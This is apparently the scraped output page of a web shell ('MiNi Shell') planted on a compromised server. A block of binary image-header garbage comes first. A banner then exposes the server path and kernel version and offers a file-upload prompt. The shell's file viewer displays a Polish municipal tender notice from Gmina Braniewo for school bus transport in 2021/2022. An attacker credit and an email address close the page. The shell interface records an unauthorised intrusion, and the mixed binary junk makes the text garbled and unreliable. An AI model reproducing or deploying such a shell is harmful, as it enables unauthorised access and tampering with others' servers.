JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210721/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210721/0012229001-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00122290 z dnia 2021-07-21</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Dowóz dzieci do szkół w roku szkolnym 2021/2022 <br/>w oparciu o bilety miesięczne. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA BRANIEWO</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 170747997</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Moniuszki 5</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Braniewo</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">14-500</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">warmińsko-mazurskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL621 - Elbląski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gmina@gminabraniewo.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">gminabraniewo.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Urząd Gminy </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dowóz dzieci do szkół w roku szkolnym 2021/2022 <br/>w oparciu o bilety miesięczne. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-ae601097-e9f6-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00122290</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-07-21</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://bipbraniewo.warmia.mazury.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://bipbraniewo.warmia.mazury.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja między Wykonawcami a Zamawiającym odbywa się przy użyciu środków komunikacji elektronicznej w rozumieniu ustawy z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną(Dz. U. z 2013 r. poz. 1422, z 2015 r. poz. 1844 oraz z 2016 r. poz. 147 i 615); przy użyciu miniPortalu https://miniportal.uzp.gov.pl/,ePUAPuhttps://epuap.gov.pl/wps/portal oraz adresów mailowych wskazanych w SWZ.<br/>Wymagania techniczne i organizacyjne dot. korespondencji elektronicznej zostały opisane w pkt. VIII i XI . SWZ ( ze względu na ograniczania techniczne Zamawiający nie umieścił tekstu wskazanych punktów)</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.01.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Dowóz dzieci do szkół w roku szkolnym 2021/2022 w oparciu o bilety miesięczne. <br/>2. Kod CPV: 60112000-6<br/>3. Przedmiotem zamówienia jest wykonanie usługowego przewozu dzieci z miejscowości położonych na terenie Gminy Braniewo do szkół podstawowych znajdujących się w Braniewie, Lipowinie i Szylenach.<br/>Wykonawca na każdy miesiąc kalendarzowy wyda miesięczne bilety dla dzieci uprawnionych do przejazdu wg wykazu sporządzonego przez Zamawiającego.<br/>Ceny biletów winny uwzględniać uprawnienia dzieci do zniżek i ulg wynikających ze stosownych przepisów. <br/> Zamawiający najpóźniej do 25 dnia każdego miesiąca w roku szkolnym przekaże. <br/> Wykonawcy zapotrzebowanie na zakup biletów. (w lutym 28 dni).<br/>Miesięczne bilety zostaną wydane Zamawiającemu w siedzibie Wykonawcy w terminie do 28 każdego miesiąca w roku szkolnym.<br/> 4. Ogólny opis systemu przewozu:<br/>Trasa dowozu powinna być w miarę możliwości najkrótszym (najdogodniejszym) odcinkiem drogi pomiędzy daną szkołą a daną miejscowością. <br/>Autobusy dowożące i odwożące powinny zatrzymywać się na przystankach w danej miejscowości i koło szkół t.j.:<br/>- Szkoły Podstawowej Nr 3 w Braniewie (ul. PCK przystanek przy szkole) <br/>- Ośrodka Szkolno Wychowawczego w Braniewie (przystanek na <br/>ul. Moniuszki)<br/>- Szkoły Podstawowej Nr 5 w Braniewie (przystanek na ul. Moniuszki)<br/>- Szkoły Podstawowej Nr 6 w Braniewie (przystanek na ul. Armii Krajowej)<br/>- Szkoły w Lipowinie (przystanek we wsi)<br/>- filii Szkoły Podstawowej w Szylenach (przystanek we wsi przy Szkole)<br/>oraz w danej miejscowości (przystanki znajdują się w poszczególnych miejscowościach) w celu zabrania lub wysadzenia dzieci i są to następujące miejscowości:<br/>Różaniec, Klejowo, Ułowo, Klejnówko, Nowa Pasłęka, Zgoda, Rodowo, Młoteczno, Glinka, Rogity, Rogity las, Marcinkowo, Brzeszczyny, Rusy, Rodowo, Szyleny Osada, Bemowizna, Szyleny kol., Szyleny wieś, Wola Lipowska, Goleszewo, Gronowo, Grzechotki, Pęciszewo, Maciejewo, Krasnolipie, Grzędowo, Krzewno, Gronówko, Leśniczówka Dąbrowa,<br/>Bobrowiec, Świętochowo, Garbina, Cielętnik, Stępień, Zakrzewiec, Żelazna Góra, Strubiny.<br/>Z miejscowości:<br/> Klejnowo dzieci powinny być dowiezione i odwiezione do: <br/>- Szkoły Podstawowej Nr 3 w Braniewie - liczba dzieci: 7<br/> Klejnówko dzieci powinny być dowiezione i odwiezione do: <br/>- Szkoły Podstawowej Nr 3 w Braniewie - liczba dzieci: 2<br/> Nowa Pasłęka dzieci powinny być dowiezione i odwiezione do: <br/>- Szkoły Podstawowej Nr 3 w Braniewie - liczba dzieci: 12<br/> Ułowo dzieci powinny być dowiezione i odwiezione do: <br/>- Szkoły Podstawowej Nr 3 w Braniewie - liczba dzieci: 7<br/>Podleśne dzieci powinny być dowiezione i odwiezione do: <br/>- Szkoły Podstawowej Nr 6 w Braniewie - liczba dzieci: 16<br/>- Filia Szkoły w Szylenach - liczba dzieci: 13<br/>Pęciszewo dzieci powinny być dowiezione i odwiezione do: <br/>- Szkoły Podstawowej w Lipowinie – liczba dzieci: 3<br/>Zgoda dzieci powinny być dowiezione i odwiezione do: <br/>- Szkoły Podstawowej Nr 6 w Braniewie - liczba dzieci: 13<br/>- Filia Szkoły w Szylenach - liczba dzieci: 2<br/>Gronowo dzieci powinny być dowiezione i odwiezione do: <br/>- Szkoły Podstawowej Nr 6 w Braniewie - liczba dzieci: 8<br/>Młoteczno dzieci powinny być dowiezione i odwiezione do: <br/>- Szkoły Podstawowej Nr 6 w Braniewie - liczba dzieci: 9<br/>Garbina dzieci powinny być dowiezione i odwiezione do: <br/>- Szkoły Podstawowej Nr 3 w Braniewie - liczba dzieci: 1<br/>Cielętnik dzieci powinny być dowiezione i odwiezione do: <br/>- Szkoły Podstawowej Nr 3 w Braniewie - liczba dzieci: 4<br/>Stępień dzieci powinny być dowiezione i odwiezione do: <br/>- Szkoły Podstawowej Nr 3 w Braniewie - liczba dzieci: 15<br/>Rogity dzieci powinny być dowiezione i odwiezione do: <br/>- Szkoły Podstawowej Nr 6 w Braniewie - liczba dzieci: 25<br/>Rogity Las dzieci powinny być dowiezione i odwiezione do: <br/>- Szkoły Podstawowej Nr 6 w Braniewie - liczba dzieci: 5<br/>Glinka dzieci powinny być dowiezione i odwiezione do: <br/>- Szkoły Podstawowej Nr 5 w Braniewie - liczba dzieci: 9<br/>Brzeszczyny dzieci powinny być dowiezione i odwiezione do: <br/>- Filia Szkoły w Szylenach - liczba dzieci: 29<br/>Bemowizna dzieci powinny być dowiezione i odwiezione do: <br/>- Filia Szkoły w Szylenach - liczba dzieci: 19<br/>Marcinkowo dzieci powinny być dowiezione i odwiezione do: <br/>- Filia Szkoły w Szylenach - liczba dzieci: 4<br/>Szyleny Osada dzieci powinny być dowiezione i odwiezione do: <br/>- Filia Szkoły w Szylenach - liczba dzieci: 4<br/>Szyleny PGR dzieci powinny być dowiezione i odwiezione do: <br/> - Szkoła podstawowa Nr 6 w Braniewie - 1<br/>Szyleny Kolonia dzieci powinny być dowiezione i odwiezione do: <br/> Filia Szkoły w Szylenach - liczba dzieci: 7 <br/>Świętochowo dzieci powinny być dowiezione i odwiezione do: <br/>- Szkoła w Lipowinie - liczba dzieci: 6<br/>Zakrzewiec dzieci powinny być dowiezione i odwiezione do: <br/>- Szkoła w Lipowinie - liczba dzieci: 13<br/>-Szkoła Podstawowa Nr 5 w Braniewie - 1<br/>Bobrowiec dzieci powinny być dowiezione i odwiezione do: <br/>- Szkoły Podstawowej nr 6 w Braniewie - liczba dzieci 4<br/>- Szkoła Podstawowa w Lipowinie - 1<br/>Maciejewo dzieci powinny być dowiezione i odwiezione do: <br/>- Szkoła Podstawowa w Lipowinie - liczba dzieci: 1<br/>Goleszewo dzieci powinny być dowiezione i odwiezione do: <br/>- Zespołu Szkół w Lipowinie - liczba dzieci: 4<br/>Szkoła Podstawowa Nr 5 w Braniewie - 1<br/>Wola Lipowska dzieci powinny być dowiezione i odwiezione do: <br/>- Szkoła Podstawowa w Lipowinie - liczba dzieci: 4<br/>Żelazna Góra dzieci powinny być dowiezione i odwiezione do:<br/>- Szkoła Podstawowa w Lipowinie - liczba dzieci: 18<br/>Grzędowo dzieci powinny być dowiezione i odwiezione do:<br/>- Szkoła Podstawowa w Lipowinie - liczba dzieci: 7<br/>Gronówko dzieci powinny być dowiezione i odwiezione do:<br/>- Szkoła Podstawowa w Lipowinie - liczba dzieci: 11<br/>Leśniczówka Dąbrowa dzieci powinny być dowiezione i odwiezione do:<br/>- Szkoła Podstawowa w Lipowinie - liczba dzieci: 1<br/>Grzechotki dzieci powinny być dowiezione i odwiezione do:<br/>- Szkoła Podstawowa w Lipowinie - liczba dzieci: 1<br/>Krasnolipie dzieci powinny być dowiezione i odwiezione do:<br/>- Szkoła Podstawowa w Lipowinie - liczba dzieci: 5<br/>Krzewno dzieci powinny być dowiezione i odwiezione do:<br/>- Szkoła Podstawowa w Lipowinie - liczba dzieci: 7<br/>Strubiny dzieci powinny być dowiezione i odwiezione do:<br/>- Szkoła Podstawowa w Lipowinie - liczba dzieci: 7<br/>Łącznie liczba uczniów i opiekunek dzieci niepełnosprawnych przewidziana do przewozu wynosi: 307 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60112000-6 - Usługi w zakresie publicznego transportu drogowego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający dopuszcza możliwość zmiany ilości dowożonych uczniów. Strony dopuszczają możliwość zmiany ilości uczniów do: +/- 10 uczniów . <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2021-09-01 do 2022-06-24</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Wiek pojazdu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają następujące warunki udziału w postępowaniu dotyczące:<br/><br/>1.2.uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów; <br/>tj. posiadają licencję na wykonywanie transportu drogowego osób udzieloną przez starostę właściwego dla siedziby Wykonawcy zgodnie z ustawą z dnia 6 września 2001 r. o transporcie drogowym (Dz.U.2021, poz. 919)<br/><br/>1.4 zdolności technicznej lub zawodowej. <br/> Wykazanie wykonania w okresie ostatnich trzech lat przed <br/> upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest <br/> krótszy – w tym okresie, co najmniej jednego zadania o wartości co najmniej <br/> 100.000,00 zł brutto (w ramach jednej umowy) w zakresie przewozu osób. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykaz wykonanych usług, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych w okresie ostatnich 3 lat a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów na rzecz których usługi zostały wykonane lub są wykonywane oraz załączeniem dowodów określających czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy były wykonywane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane; a jeżeli Wykonawca z przyczyny niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy, w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy. Dokument ten ma potwierdzać spełnienie wymagań wskazanych w pkt XV. 1.4. SWZ. – (według wzoru stanowiącego załącznik nr 4 do SWZ). <br/><br/>Licencja na wykonywanie transportu drogowego osób udzieloną przez starostę właściwego dla siedziby Wykonawcy zgodnie z ustawą z dnia 6 września 2001 r. o transporcie drogowym (Dz.U.2021, poz. 919)</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z postanowieniami art. 455 ust. 1, pkt 1 ustawy P.z.p. Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej Umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, pod warunkiem podpisania aneksu zaakceptowanego przez obydwie Strony, a mianowicie:<br/><br/>a)	aktualizację danych Wykonawcy poprzez: zmianę nazwy firmy, zmianę adresu siedziby, zmianę formy prawnej Wykonawcy itp.,<br/>b)	uwzględnienie zmiany stawki podatku VAT, w przypadku ustawowej zmiany podatku VAT pod warunkiem, iż Wykonawca wykaże, że zmiana stawki podatku od towarów i usług realnie zwiększyła koszty Wykonawcy przy realizacji przedmiotu umowy,<br/>c)	zmianę terminu realizacji zamówienia z przyczyn niezależnych od Wykonawcy lub Zamawiającego, które to przyczyny każda ze stron musi udokumentować,<br/>d)	zmianę terminu rozpoczęcia świadczenia usługi (np. w przypadku przedłużenia procedur przetargowych) z zachowaniem jej terminu końcowego z jednoczesnym zmniejszeniem wynagrodzenia Wykonawcy stosownie do skróconego okresu świadczenia i zmniejszenia zakresu świadczenia,<br/>e)	zmniejszenie zakresu przedmiotu zamówienia oraz związane z tym zmniejszenie wartości umowy, wynikające z przyczyn niezależnych od Zamawiającego lub Wykonawcy, które to przyczyny każda ze stron musi udokumentować,<br/>f)	zamianę/zastąpienie pojazdu wymiennego przedstawionego przez Wykonawcę do realizacji niniejszego przedmiotu umowy w sytuacji awarii, usterki pojazdu, kradzieży pojazdu i każdą inną sytuację uniemożlwiającą świadczenia usługi przewozu tymże pojazdem – pod warunkiem, iż pojazd zamienny będzie posiadał parametry nie gorsze niż zadeklarowane przez Wykonawcę w ofercie, <br/>g)	zamianę/ zastąpienie osoby wykonującej niniejszy przedmiot umowy w sytuacji utarty uprawień do prowadzenia pojazdów, absencji lub innych zdarzeń losowych powodujących niemożność świadczenia usługi – pod warunkiem iż osoba zastępująca będzie posiadała uprawnienia do prowadzenia pojazdów określone przez Zamawiającego w SWZ.<br/>3.	Warunki dokonania zmian do umowy: <br/>1) Strona występująca o zmianę postanowień umowy zobowiązana jest do udokumentowania zaistnienia okoliczności, na które powołuje się, jako podstawę zmiany umowy.<br/>2) wniosek o zmianę postanowień umowy musi być sporządzony na piśmie.<br/>3) wniosek, o którym mowa w ust. 2 powyżej musi zawierać:<br/> a)opis propozycji zmiany, <br/> b)uzasadnienie zmiany, <br/> c)opis wpływu zmiany na warunki realizacji umowy.<br/>4.	Zmiana umowy może nastąpić wyłącznie w formie pisemnego aneksu pod rygorem nieważności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-07-29 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem Formularza do złożenia dostępnego na ePUAP i udostępnionego również na miniPortalu</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-07-29 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-08-27</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-07-21 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com